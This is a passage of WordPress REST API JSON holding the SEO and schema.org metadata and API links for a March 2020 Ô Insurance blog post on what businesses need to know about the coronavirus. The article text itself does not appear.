Insurance","article_publisher":"https:\/\/www.facebook.com\/oinsurancegroup\/","article_published_time":"2020-03-16T19:32:59+00:00","article_modified_time":"2020-03-18T15:15:44+00:00","og_image":[{"width":1600,"height":900,"url":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/3522891-scaled.jpg","type":"image\/jpeg"}],"author":"Rafael Gesser","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Rafael Gesser","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/#article","isPartOf":{"@id":"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/"},"author":{"name":"Rafael Gesser","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223"},"headline":"Coronav\u00edrus: tudo que voc\u00ea e sua empresa precisam saber","datePublished":"2020-03-16T19:32:59+00:00","dateModified":"2020-03-18T15:15:44+00:00","mainEntityOfPage":{"@id":"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/"},"wordCount":579,"commentCount":0,"publisher":{"@id":"https:\/\/blog.oinsurance.com.br\/#organization"},"image":{"@id":"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/#primaryimage"},"thumbnailUrl":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/3522891-scaled.jpg","articleSection":["Gest\u00e3o de Benef\u00edcios"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/","url":"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/","name":"Coronav\u00edrus: tudo que voc\u00ea e sua empresa precisam saber - \u00d4 Insurance","isPartOf":{"@id":"https:\/\/blog.oinsurance.com.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/#primaryimage"},"image":{"@id":"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/#primaryimage"},"thumbnailUrl":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/3522891-scaled.jpg","datePublished":"2020-03-16T19:32:59+00:00","dateModified":"2020-03-18T15:15:44+00:00","breadcrumb":{"@id":"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/#primaryimage","url":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/3522891-scaled.jpg","contentUrl":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/3522891-scaled.jpg","width":1600,"height":900,"caption":"coronav\u00edrus"},{"@type":"BreadcrumbList","@id":"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/blog.oinsurance.com.br\/"},{"@type":"ListItem","position":2,"name":"Coronav\u00edrus: tudo que voc\u00ea e sua empresa precisam saber"}]},{"@type":"WebSite","@id":"https:\/\/blog.oinsurance.com.br\/#website","url":"https:\/\/blog.oinsurance.com.br\/","name":"\u00d4 Insurance","description":"Seguros Pessoais e Empresariais","publisher":{"@id":"https:\/\/blog.oinsurance.com.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/blog.oinsurance.com.br\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/blog.oinsurance.com.br\/#organization","name":"\u00d4 Insurance","url":"https:\/\/blog.oinsurance.com.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/","url":"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1","contentUrl":"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1","width":409,"height":179,"caption":"\u00d4 Insurance"},"image":{"@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/oinsurancegroup\/","https:\/\/www.instagram.com\/oinsurance\/","https:\/\/www.linkedin.com\/company\/oinsurance\/"]},{"@type":"Person","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223","name":"Rafael Gesser","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g","caption":"Rafael Gesser"}}]}},"_links":{"self":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/posts\/2414"}],"collection":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/comments?post=2414"}],"version-history":[{"count":0,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/posts\/2414\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/media\/2417"}],"wp:attachment":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/media?parent=2414"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/categories?post=2414"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/tags?post=2414"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}